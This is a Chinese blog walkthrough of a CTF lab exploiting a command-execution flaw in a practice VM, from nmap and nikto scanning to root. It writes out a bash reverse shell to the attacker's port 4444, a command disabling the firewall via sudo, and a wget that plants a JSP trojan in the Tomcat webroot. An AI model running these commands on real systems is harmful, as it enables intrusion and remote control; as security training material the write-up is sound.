ctf训练 web安全命令执行漏洞

最新推荐文章于 2024-07-30 15:39:43 发布
原创 最新推荐文章于 2024-07-30 15:39:43 发布 · 1.1k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文围绕CTF训练中的Web安全命令执行漏洞展开。先介绍了命令执行漏洞的成因,即用户可控制命令执行函数参数且未过滤输入时易造成攻击。接着搭建实验环境,进行信息探测、深入挖掘,利用漏洞获取用户信息、系统信息,还实现了反弹shell、下载木马文件,最终获取Flag,也提及不同情况的应对方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ctf训练 web安全命令执行漏洞

命令执行漏洞介绍

当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。

调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。

实验环境

一台kail攻击机 和 靶机
靶机镜像:https://pan.baidu.com/s/19k8jz7VARhFW3LYw8U6T9w
提取码:97qz

安装打开靶机(使用Oracle VM VirtualBox打开):
(注意:靶机用桥接模式则攻击机也用桥接模式,注意检查!!!!)

接下来发现没法登陆,也没有办法获取ip地址
所以我们在kail下
进入控制台

使用netdiscover命令 netdiscover -r ip/子网掩码 命令来探测靶机
在这里插入图片描述这里我们就探测出靶机ip为192.168.43.187

本机ip为192.168.43.96
在这里插入图片描述

信息探测

扫描主机服务信息以及服务版本

– nmap -sV靶场IP地址

在这里插入图片描述

快速扫描主机全部信息
– nmap -T4 -A -v靶场lP地址
在这里插入图片描述

探测敏感信息
– nikto -host http://靶场IP地址:端口

这里开放http服务的是8080端口,所以这里我们端口 号跟8080,这个是在上面信息探测出来的结果
在这里插入图片描述发现可疑目录,/test.jsp
在这里插入图片描述深入挖掘

分析nmap 、nikto扫描结果,并对结果进行分析,挖掘可以利用的信息;

使用浏览器打开http://ip:port/敏感页面,查看敏感信息,找到可利用的位置;

访问
在这里插入图片描述这里我们想着把之前发现的可疑目录加上然后访问
在这里插入图片描述按照提示,我们输入ls -l/tmp,可以看到页面返回了一些东西,存在着命令执行漏洞
在这里插入图片描述漏洞利用

查看临时缓冲目录: ls -alh /tmp/
在这里插入图片描述

查看home目录,挖掘用户信息:ls -alh /home/

发现了用户名bill
在这里插入图片描述

查看具体用户的目录:ls -alh /home/用户名/

这里最后一行我们可以看到具有ssh服务,可以使用sudo来拿到root
在这里插入图片描述

查看系统信息:uname -a

查看到了靶机系统 的信息,为ubuntu系统

在这里插入图片描述

利用ssh命令执行root权限命令

使用ssh用户名@localhost通过ssh登录服务器是不需要身份验证的;

查看bill用户sudo命令的权限:ssh bill@localhost sudo -I
在这里插入图片描述

关闭防火墙:ssh bill@localhost sudo ufw disable

在这里插入图片描述
反弹shell

监听4444端口

nc -lvp 4444

在这里插入图片描述

靶场机器反弹shell
ssh bill@localhost sudo bash -i >& /dev/tcp/攻击机ip/4444 0>&1
在这里插入图片描述已经拿到了shell了
在这里插入图片描述

渗透测试技巧

开启python简易http服务器
python -m SimpleHTTPServer

利用命令执行下载木马文件
ssh bill@localhost sudo wget “http://ip:port/shell,isp” -O/var /lib/tomcat8/webapps/ROOT/shell.isp

获取Flag

一般情况下,靶场机器的flag值是存放在服务器的根目录下,/root/目录。
cd /root/
ls
cat flag

在这里插入图片描述

总结:
在cTf比赛中,命令执行漏洞具有很多过滤机制。对于开放ssh服务的靶场机器,可以采取以上方法进行渗透靶场机器。如果没有开放ssh服务,则需要利用绕过过滤技巧来达到命令执行的目的。

漏洞扫描 CTF
m0_68249386的博客
04-29 526
目录 文章目录目录一、基础知识1.CTF简介2.竞赛模式3.比赛形式4.题目类型二、web 信息泄露1.目录遍历2.PHPINFO3.备份文件下载3.1 网站源码3.2 bak文件3.3 vim缓存3.4 .DS_Store 一、基础知识 1.CTF简介 步骤 1.登录CTFHub—>技能树---->基础知识 2.CTF简介---->开启题目---->题目附件---->复制FLAG粘贴---->提交 2.竞赛模式 步骤 1.竞赛模式---->开启题目---
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2712
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTF-web命令执行漏洞
IT小学子的博客
05-03 618
文章目录命令执行漏洞 命令执行漏洞 命令执行漏洞概念:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 漏洞成因:脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法解除系统底层,如果我们开发的应用需要一些...
ctf web 文件包含漏洞(例题)
weixin_49298265的博客
11-29 5735
文件包含漏洞 php://协议 php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。 一、php://filter 当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行base64编码,阻止其不执行。从而导致任意文件读取。 http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=index.
CTF-web文件上传漏洞
am_03的博客
08-23 582
文件上传漏洞 文件上传功能 文件上传流程和上传攻击 WebShell——网页木马文件 以php语言创建一句木马: 之间的gok为连接的木马 将其放入phpstudy工具的网站根目录里,即网址为http://10.0.3.23/eval.php 利用菜刀连接木马 打开后,右键添加 右键->文件管理,可以看到里面的信息 还可以模拟端 右键->数据库管理 大马介绍 一句话木马介绍 一句话木马连接 文件上传漏洞利用 登录后,点击File Upload,上传前面制
基于CTF探讨Web漏洞的利用与防范
Welcome To Myon'Blog !
12-20 2030
随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这也使得越来越多的用户关注应用层的安全问题,对Web应用安全的关注度也逐渐升温。
网络安全CTF系列培训教程之Web篇-文件上传漏洞
最新发布
ctfayang的博客
07-30 1294
大多数的文件上传漏洞被利用后,攻击者都会留下webshell以方便后续进入系统。攻击者在受影响系统放置或者插入webshell后,可通过该webshell更轻松,更隐蔽的在服务器中为所欲为。这里需要特别说明的是上传漏洞的利用经常会使用webshell,而webshell的植入远不止文件上传这一种方式。(例如还可以通过其他命令执行,数据库插入等方式植入webshell)
基于CTF的网络安全竞赛平台设计.pdf
09-20
这些漏洞通常由于开发人员未能对用户输入进行适当的安全检查,导致攻击者可以执行未授权的命令或查询。 - 跨站脚本攻击(XSS):这是一种常见的Web安全威胁,攻击者可以通过用户输入未经过滤的字符,在用户浏览器中...
i春秋CTF训练 Web Test
椰奶冻不安全的博客
07-05 1779
Web Test 题目内容:善于查资料,你就可以拿一血了。 题目链接请在i春秋申请 根据提示直接在搜索引擎上查询海洋cms漏洞,发现曾经有过前台getshell,用poc试一下 searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpa
CTF网络安全课程:代码执行至Python开发安全教学
### 代码执行与命令执行安全漏洞与防御 代码执行漏洞发生在应用程序执行了未经适当验证的用户输入的代码,或者没有足够限制用户输入的情况下。这可以导致攻击者执行任意代码,从而控制服务器。 **防御措施:** - ...
ctf-web:文件上传漏洞和文件解析漏洞
热门推荐
薯片薯条的博客
10-11 9万+
这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍. 其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,还有这几个漏洞的利用就是web渗透…这不就是我好几年前看的东西么… 当然,其实我也学的不是很精通,只是稍微会一点,就不夸夸其谈了. 先说说这两个漏洞的区别. 一.文件上传漏洞 这个漏洞产生的原因是因为上传文件的不严谨所产生的.比如我恶意上传了一个一句话木马,但是服务器没有进行对文件的过滤,就会将.
命令执行漏洞CTF
qq_46085232的博客
07-09 558
命令执行漏洞CTF[ACTF2020 新生赛]Exec[GXYCTF2019]Ping Ping Ping总结 作为菜鸟的我,开始想通过玩玩ctf,加深自己对漏洞的理解,和掌握一些绕过的思路。真的很好玩 [ACTF2020 新生赛]Exec 这是我做的第一道有关命令执行的题。(题目简单,就不贴图了) 1.通过标题,和一进去的ping的页面,就知道这里考的是命令执行,又因为这里是新生赛,难度也不大 2.通过我所学的知识,用‘;ls’,查看当前目录,然后就行通过echo写入一句话后门,也成功写入。用蚁剑连接,
ctf-web:关于文件上传漏洞的深入研究
薯片薯条的博客
10-14 8万+
上次我们研究了关于文件上传的漏洞,这次我们研究的内容属于上节课的补充内容,关于文件上传的绕过与防御. 怎么说呢,算是一种锻炼吧. 因为下个月有个awd的比赛,因此最近会经常发一些关于web的内容. 其实我还是挺慌的,因为以前参加的都是ctf线上赛,而且我做的都是逆向这个方面的,然而这次突然来了个web,搞得我有点懵. web也是最近才开始研究的,所以写的可能不尽人意,希望各位大佬看看就好,不喜勿喷. 一.实验环境 我们这次的实验依然用的是上次的网站和phpstudy.我发在了下面. 1.upload-f.
ctf-web:文件包含漏洞和举例-HCTF2018 WarmUp
薯片薯条的博客
10-15 8万+
我又回来更新了,这次是关于web方面的文件包含漏洞.我会在后面以详细的角度来写清楚这个漏洞的利用方法. 当然,以下都是我自己的理解,表述什么的都有些野人化了.所以希望各位大佬手下留情. 一.漏洞产生的原因 这个漏洞可以追溯到很久.更准确来说,其实是人为产生的.由于我php学的不是很专业,所以我就拿c语言来举例了.php里面使用的是include命令,c语言使用的是#include预处理命令.作用是相似的. 我新建了两个文件,内容如图. wzc.h: #include "stdio.h" void pri.
浅谈CTF中的逻辑漏洞
PICACHU+++的博客
10-07 1538
逻辑漏洞主要是指程序逻辑上出现的问题,例如逻辑不严密或者逻辑太复杂,从而导致一些逻辑分支不能正常处理或处理错误,通常这类漏洞多以月权访问,密码爆破等等。
ctf入门漏洞挖掘
Tesi1a的充电桩
04-16 5138
基本功是计算机基础三大金刚的学习:体系结构–cpu的设计与实现 机器指令与汇编语言 指令的解码,执行 内存管理 CMU 18-477 introduction to Computer Architecture https://www.ece.cmu.edu/~ece447/s15/doku.php https://www.ece.cmu.edu/~ece447/s13/doku.php?
使用java api 实现操作 hdfs
qq_41135504的博客
09-21 1599
使用java api操作hdfs 1. eclipse中创建maven项目 1.1 apache-maven-3.3.9环境配置 新建一个目录存放maven 配置maven环境变量 系统变量:MAVAN_HOME=C:\Application\apache-maven-3.3.9 //地址是存放maven的目录 系统变量:PATH=%MAVEN_HOME%\sbin 打开cmd,输入:mvn -version回车 C:\Users\23011>mvn -version Apac
记录遇到的有趣的CTF题---simple_api(xxe漏洞)
tothemoon的博客
11-05 2375
这是我参加的一场校内的CTF比赛。大佬们的write up还在整理当中,我就先用我之前做题时的截图做一个简单的复现。write up出来后再查漏补缺。 1.打开网站后除了这个啥也没有,查看源代码也没有提示。 学过python的同学应该会发现这一段字典,但在这里的意思应该是响应错误,但仔细看了源码后也没与发现注入点,这时想到题目名为simple_api。 抓包添加xxe代码后就能跑出flag了。 x...
漏洞挖掘】攻击对外开放的Docker API接口
weixin_30359021的博客
01-22 381
https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124 1)场景 攻击开放在互联网的Docker API 2)问题难点 Docker API外放有什么危害? 3)解决问题的方法 理解客户API公开互联网的原理 信息收集和枚举 利用Docker CLI测试暴露的API 批量挖掘 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱吃香菜的哈哈

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值